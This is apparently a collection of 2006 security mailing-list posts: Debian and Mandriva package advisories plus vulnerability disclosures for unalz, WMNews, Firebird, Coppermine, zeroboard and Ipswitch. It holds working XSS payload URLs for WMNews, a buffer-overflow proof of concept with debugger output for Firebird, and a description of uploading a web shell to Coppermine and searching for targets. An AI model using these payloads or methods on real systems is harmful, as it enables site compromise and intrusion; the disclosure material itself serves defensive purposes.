  Size/MD5 checksum:  1059666 5b73bdfab02c7c8184b58db2c3e0b240

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_m68k.deb
  Size/MD5 checksum:   942614 c15e8b65687c52530e48665669dde8c3

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_mips.deb
  Size/MD5 checksum:  1035974 ce95aa0adb6060fc68119c4df3492293

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_mipsel.deb
  Size/MD5 checksum:  1036400 f40b42f381d7f04004f219c16de542fc

  PowerPC architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_powerpc.deb
  Size/MD5 checksum:  1009720 8b0372d551b48829ce6be7d0f69f6559

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_s390.deb
  Size/MD5 checksum:  1002210 deef79ef16b8f5bac2b32f912caac46c

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_sparc.deb
  Size/MD5 checksum:  1003974 2bf876aa4b6a50cb3aadb7ef2e233f69


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3.dsc
  Size/MD5 checksum:  680 8f2f1848dcdfe9d143d8e9352ef918ca

http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3.diff.gz
  Size/MD5 checksum:19639 9ffb89fa0a770568ddd80a11e3eada78
http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1.orig.tar.gz
  Size/MD5 checksum:  4059170 1cc77c6943baaa711222e954bbd785e5

  Alpha architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3_alpha.deb
  Size/MD5 checksum:  2155538 07b4643bf4cd05639a261fa0b3fa6a89

  AMD64 architecture:

Secunia Research: unalz Filename Handling Directory Traversal Vulnerability

[Secunia Research]

== 

 Secunia Research 13/03/2006

 - unalz Filename Handling Directory Traversal Vulnerability -

== 
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Secunia8
Verification.9

== 
1) Affected Software 

* unalz version 0.53.

Other versions may also be affected.

== 
2) Severity 

Rating: Less Critical
Impact: System access
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in unalz, which
potentially can be exploited by malicious people to compromise a
user's system.

The vulnerability is caused due to an input validation error when
extracting an ALZ archive. This makes it possible to have files
extracted to arbitrary locations outside the specified directory
using the ../ directory traversal sequence.

The vulnerability has been confirmed in version 0.53. Other version
may also be affected.

== 
4) Solution 

Update to version 0.55. 

== 
5) Time Table 

02/03/2006 - Initial vendor notification.
10/03/2006 - Initial vendor reply.
13/03/2006 - Public disclosure.

== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2006-0950 for the vulnerability.

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-16/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

WMNews Cross Site Scripting

[exalibur33]

-
WMNews Cross Site Scripting 

Site:http://wartamikael.org/PHPScripts/
Demo:http://www.scriptevi.com/files/demo/news/wmnews/

---
Credit : R00T3RR0R
webpage:www.biyosecurity.be
Mail   :[EMAIL PROTECTED]

-
WMNews

http://victim/path/wmview.php?ArtCat=;scriptalert(/R00T3RR0R/)/script
http://victim/path/footer.php?ctrrowcol=;scriptalert(/R00T3RR0R/)/script
http://victim/path/wmcomments.php?act=viCmID=2ArtID=;scriptalert(/R00T3RR0R/)/script



Source:

http://www.blogcu.com/Liz0ziM/350164/

http://biyosecurity.be/bugs/wmnews.txt

Buffer Overflow and Installation Script Error in Firebird 1.5.3

[Joxean Koret]

Hi to all!

In the latest Firebird release (1.5.3) various security problems has
been fixed. Attached goes an advisory about 2 of these.

---
Joxean Koret


---
 Buffer Overflow and Installation Script Error in Firebird 1.5.3
---

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005-02-18
Location: Basque Country

---

Affected software description:
~~

Product: Firebird 
Vulnerable Version: 1.5.2.4731

Description:

Firebird is a relational database offering many ANSI SQL-99 features that runs
on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent 
concurrency, high performance, and powerful language support for stored 
procedures and triggers. It has been used in production systems, under a 
variety 
of names since 1981.

Web : http://firebird.sourceforge.net

---

Vulnerability List:
~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily
B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:


A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily

 - The installation script of Firebird 1.5.2 makes the binaries fb_inet_server 
and fbserver suid firebird but this is unnecesary. If you takes a look to the 
install script firebird1.5.2./scripts/postinstall.sh you will see the 
following lines:

(...)
# SUID is still needed for group direct access.  General users
# cannot run though.
for i in fb_lock_mgr gds_drop fb_inet_server
do
if [ -f $i ]
  then
chmod ug=rx,o= $i
chmod ug+s $i
fi
done
(...)

but, as the author says the fb_inet_server (at least) doesn't need to be suid 
firebird.
The following is a fragment of Alex Peshkov (a Firebird developer) response 
about 
this problem: 

They need not and should not be set*id. And in standard precompiled 
binaries fbserver is not setuid. But for unknown to me reasons 
fb_inet_server is made setuid 'firebird' by install script (Debian guys 
fixed it, I think). I've noticed it, unfortunately, after release of 
1.5.2, but definitely will fix it in future releases. Except security 
vulnerability this brings additional problem when one wants to change 
fb_inet_server run-user - changing only xinetd.d entry is not enough.

 - Debian distributions are not vulnerable to this problem. As the Alex Peshkov 
says
Debian people has been fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

 - The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable 
to buffer overflows. If an string of more than 150 characters is passed to the
'-p' parameter of any of these binaries the program will crash with a 
Segmentation Fault message.

 - The following is a test of the vulnerability:
 
/usr/lib/firebird2/bin$ ls
fb_lock_print  fbguard  fbmgr  fbmgr.bin  fbserver  gsec
/usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print ax155;'`1234
Segmentation fault

The program dies abruptly. The bytes passeds from position 155 to 159
overwrites the return address:

/usr/lib/firebird2/bin$ gdb ./fbserver
GNU gdb 6.3
(...)
(gdb) run -p `perl -e 'print ax155;'`4321
Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print
ax155;'`4321
(...)   
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1210892160 (LWP 25358)]
0x31323334 in ?? ()

We have been overwrite the return address with the bytes 0x31 0x32 0x33 0x34, 
the numbers 4 3 2 1 in reverse order.

(gdb) where
#0  0x31323334 in ?? ()
#1  0x08233496 in ?? ()
#2  0x in ?? ()
#3  0xb9b0 in ?? ()
#4  0x6161 in ?? ()
#5  0x in ?? ()
#6  0x in ?? ()
#7  0x in ?? ()
#8  0x in ?? ()
#9  0x in ?? ()
#10 0xb9b0 in ?? ()
#11 0x in ?? ()
#12 0x in ?? ()
#13 0x in ?? ()
#14 0xbb04 in ?? ()
#15 0x0804e370 in ?? ()
#16 0x in ?? ()
#17 0xbd50 in ?? ()
#18 0x in ?? ()
#19 0x in ?? ()
#20 0x in ?? ()
#21 0x in ?? ()
#22 0x in ?? ()

Notes:
~~

 - Various other problems, not discovered by me, has been fixed in the 1.5.3
version. I encourage to upgrade to the newest version as soon as possible.

Patches for the 

Re: Coppermine exploit used by a Chase Phish?

[Nexus]

Coppermine is subjectable to multiple exploits, for the most part 
exploiters do not need to have much knowledge of it's working. There is 
a script called nst.php which is saved as a rar file and uploaded into 
the coppermine (unless coppermine is properly configured to now access 
anything bt image files) this nst.php script allows them to run a local 
acct on the system and browse through directories,upload new files even 
access sql u/p and the sql database. there is a good possablity this is 
what happened


some kid hacked the coppermine using a script simular to the nst.php 
uploaded it, got into the sever, and simply uplaoded the phish script. 
pretty easy to do actually, and a simple google search for 
[subject],powered by coppermine will give a extended list of possible 
targets for the exploiter to attack.


Paul Laudanski wrote:
I got sent a Chase phish email tonight and in checking it out it appears 
to be live on a Coppermine gallery installation.  Is this a new exploit of 
Coppermine, or just this site hasn't been yet patched?


A photo of the phish site with the URL (domain blacked out):

http://castlecops.com/p728141-Mar_10_Phish_Alerts.html#728141

  

[INetCop Security Advisory] zeroboard IP session bypass XSS vulnerability

[dong-hun you]

INetCop Security Advisory #2006-0x82-029



* Title: zeroboard IP session bypass XSS vulnerability


0x01. Description


Zeroboard is a popular web notice board used in Korea.

INetCop Security found XSS vulnerability in the latest zeroboard version 4.1 pl 
7 (2005. 4. 4).
Basically, zeroboard uses the following algorithm so that session may not be 
abused
by the attack related with cookie. (e.g: cookie spoofing, sniffing)

After login, is part that handle session: --

bbs/login_check.php:
...
24  // 회원로그인이 성공하였을 경우 세션을 생성하고 페이지를 이동함
25  if($member_data[no]) {
26
27  if($auto_login) {
28  makeZBSessionID($member_data[no]);
29  }
30
31  // 4.0x 용 세션 처리
32  $zb_logged_no = $member_data[no];
33  $zb_logged_time = time();
34  $zb_logged_ip = $REMOTE_ADDR; --- Recording IP address
35  $zb_last_connect_check = '0';
36
37  session_register(zb_logged_no);
38  session_register(zb_logged_time);
39  session_register(zb_logged_ip);
40  session_register(zb_last_connect_check);
41
--

If IP address is different from present session user's, connection terminates: 
--

bbs/lib.php:

94  // 세션 값을 체크하여 로그인을 처리
95  } elseif($HTTP_SESSION_VARS[zb_logged_no]) {
96
97  // 로그인 시간이 지정된 시간을 넘었거나 로그인
아이피가 현재 사용자의 아이피와 다를 경우 로그아웃 시킴
98  if(time()-$HTTP_SESSION_VARS[zb_logged_time]
$_zbDefaultSetup[login_time]||$HTTP_SESSION_VARS[zb_logged_ip]!=$REMOTE_ADDR)
 {
99
   100  $zb_logged_no=; // session 
initialization
   101  $zb_logged_time=;
   102  $zb_logged_ip=;
   103  session_register(zb_logged_no);
   104  session_register(zb_logged_ip);
   105  session_register(zb_logged_time);
   106  session_destroy();
   107
   108  // 유효할 경우 로그인 시간을 다시 설정
   109  } else {
--


This seems to be intercepting cookie hacking.
But, if we take advantage of IP session disablement technique, session 
bypassing may be possible.
Detailed explanation about the way to exploit this vulnerability is found at 
the following reference.

URL: http://x82.inetcop.org/h0me/papers/iframe_tag_exploit.txt (Korean)

As a result, hacker through administrator's web browser exploit code workably 
become.


--


0x02. Vulnerable Packages


Vendor site: http://www.nzeo.com/

Low versions including Zeroboard 4.1 pl 7 (2005. 4. 4) version.
-zb41pl7.tar.Z 

Disclosure Timeline:
2003-04.??: Vulnerabilities found.
2006-02.17: 1st vendor contact. (didn't respond)
2006-02.22: 2nd vendor contact. (didn't respond)
2006-02.25: Vendor responded, patch released.
2006-03.12: Public disclosure.


0x03. Exploit


We have 2 `Proof-of-Concept' exploit about this vulnerability.

This XSS vulnerability happens in memo box title and user email, homepage 
information input.
When administrator logins and checks a user information page, attack code can 
be achieved,
and there is another way, which injects an attack code in memo title.
After exploit, an attacker can inject PHP code through an administrator web 
page function.
Through this PHP code injection, the attacker(normal user) can change the 
password of
administrator, and take administrator's privilege

To prevent the abuse of this vulnerabilty, INetCop Security will not publish 
POC code.


0x04. Patch


INetCop Security released temporary patch:
INetCop Security Patch URL: 
http://inetcop.net/upfiles/Zeroboard-4.1_pl7_patch.tgz

And vendor's patch after INetCop Security advisory:
Vendor Patch URL: http://www.nzeo.com/bbs/zboard.php?id=cgi_bugreport2no=5406

--
Thank you.

P.S: I give thanks to Securityproof that suffer translation.
Korean Advisory URL: 
http://www.inetcop.org/upfiles/33INCSA.2006-0x82-029-zeroboard.pdf


--
By dong-houn yoU (Xpl017Elz), in INetCop(c) Security.

MSN  E-mail: szoahc(at)hotmail(dot)com,
  xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org
 My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--




-- 
___
Get your free email from http://www.hackermail.com

[SECURITY] [DSA 997-1] New bomberclone packages fix arbitrary code execution

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 997-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 13th, 2006http://www.debian.org/security/faq
- --

Package: bomberclone
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0460
BugTraq ID : 16697

Stefan Cornelius of Gentoo Security discovered that bomberclone, a
free Bomberman-like game, crashes when receiving overly long error
packets, which may also allow remote attackers to execute arbitrary
code.

The old stable distribution (woody) does not contain bomberclone packages.

For the stable distribution (sarge) these problems have been fixed in
version 0.11.5-1sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 0.11.6.2-1.

We recommend that you upgrade your bomberclone package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.dsc
  Size/MD5 checksum:  668 e59985e92646e66e09f0c904cc777e82

http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.diff.gz
  Size/MD5 checksum: 6985 a9d9696db932b11774b839d2b765fd31

http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5.orig.tar.gz
  Size/MD5 checksum:  7985803 cd2834d68980dd506038db44728cd2b1

  Architecture independent components:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone-data_0.11.5-1sarge1_all.deb
  Size/MD5 checksum:  7586908 c869506540ddfc25d3c452f32350d4ff

  Alpha architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_alpha.deb
  Size/MD5 checksum:   128338 d97db6f509a94124fab9e20cdcabb2a4

  AMD64 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_amd64.deb
  Size/MD5 checksum:   114644 827f5f7850204fd2166a34258f17a71d

  ARM architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_arm.deb
  Size/MD5 checksum:   117114 3e0cf308c1cb3a93a032eddfb7331f9c

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_i386.deb
  Size/MD5 checksum:95614 626662760c83f79e2119e7e896970d4f

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_ia64.deb
  Size/MD5 checksum:   171882 ed2ef72266943a1cc789f3b6f0ba7358

  HP Precision architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_hppa.deb
  Size/MD5 checksum:   107690 383b107de7545ced60bb5afa38b4ed92

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_m68k.deb
  Size/MD5 checksum:94488 32dc2741532866a837e1a6c8d7909b06

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mips.deb
  Size/MD5 checksum:   116202 e8c5cb65dfcfd70ffe8b6320188a6728

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mipsel.deb
  Size/MD5 checksum:   116026 29263ffcbf426c911e0b3d8a034a9b92

  PowerPC architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_powerpc.deb
  Size/MD5 checksum:   101888 0813f5ce3091cb8b7d482221c6b0a98f

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_s390.deb
  Size/MD5 checksum:   113050 b5298b8a579f76f1fd0751a64f2835d3

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_sparc.deb
  Size/MD5 checksum:   102884 72313829a57423a10dd1d200775c9f0d


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: 

[ MDKSA-2006:055 ] - Updated gnupg packages fix signature file verification vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:055
 http://www.mandriva.com/security/
 ___
 
 Package : gnupg
 Date: March 13, 2006
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Another vulnerability, different from that fixed in MDKSA-2006:043
 (CVE-2006-0455), was discovered in gnupg in the handling of signature
 files.
 
 This vulnerability is corrected in gnupg 1.4.2.2 which is being
 provided with this update.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0049
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 78bc5edadc4c09cc79301e92e769792b  10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.i586.rpm
 a64138f15d9d24c9fd342a9d58739629  10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 921557b980e6831d91f67c1be03ff221  
x86_64/10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.x86_64.rpm
 a64138f15d9d24c9fd342a9d58739629  
x86_64/10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 ff09cfa3b8f71b9e5ddf4a7639696b9d  
2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.i586.rpm
 22b6b9305f47570652dc276cf8f18401  
2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 388c4bca33be3cccb9a44e87b1a34964  
x86_64/2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.x86_64.rpm
 22b6b9305f47570652dc276cf8f18401  
x86_64/2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm

 Corporate 3.0:
 cd7fbec4de29eabcc31fdeb90e05f674  
corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.i586.rpm
 54fa6da091d1124b661a9fbc4f21abe1  
corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 f43a3a505f7874324542f16398243786  
x86_64/corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.x86_64.rpm
 54fa6da091d1124b661a9fbc4f21abe1  
x86_64/corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 3a998c3c9451bba3ac118df3a8b74955  
mnf/2.0/RPMS/gnupg-1.4.2.2-0.1.M20mdk.i586.rpm
 18cfe29d05e64e08c77bab8683517798  
mnf/2.0/SRPMS/gnupg-1.4.2.2-0.1.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEFcoumqjQ0CJFipgRAo0CAKCTHjbpAjG4GONKzPzHGja45wyVAgCgyApo
91TxmG2szENod45PnFctWyg=
=5TQS
-END PGP SIGNATURE-

ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability

[zdi-disclosures]

ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-003.html
March 13, 2006

-- CVE ID:
CVE-2005-3526

-- Affected Vendor:
Ipswitch

-- Affected Products:
Ipswitch Collaboration Suite 2006.02 and below

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 13, 2005 by Digital Vaccine protection
filter ID 3982. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Ipswitch Collaboration Suite.
Authentication is required to exploit this vulnerability.

This specific flaw exists within the IMAP daemon. A lack of bounds
checking during the parsing of long arguments to the FETCH verb can
result in an exploitable buffer overflow.

-- Vendor Response:
From http://www.ipswitch.com/support/ics/updates/ics200603prem.asp:

IMAP: Corrected a vulnerability issue where a properly crafted Fetch
command causes IMAP to crash with a buffer overflow (disclosed by
TippingPoint, a division of 3Com). 

-- Disclosure Timeline:
2005.12.13 - Vulnerability reported to vendor
2005.12.13 - Digital Vaccine released to TippingPoint customers
2006.03.13 - Public release of advisory

-- Credit:
This vulnerability was discovered by Manuel Santamarina Suarez aka 
'FistFuXXer'.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.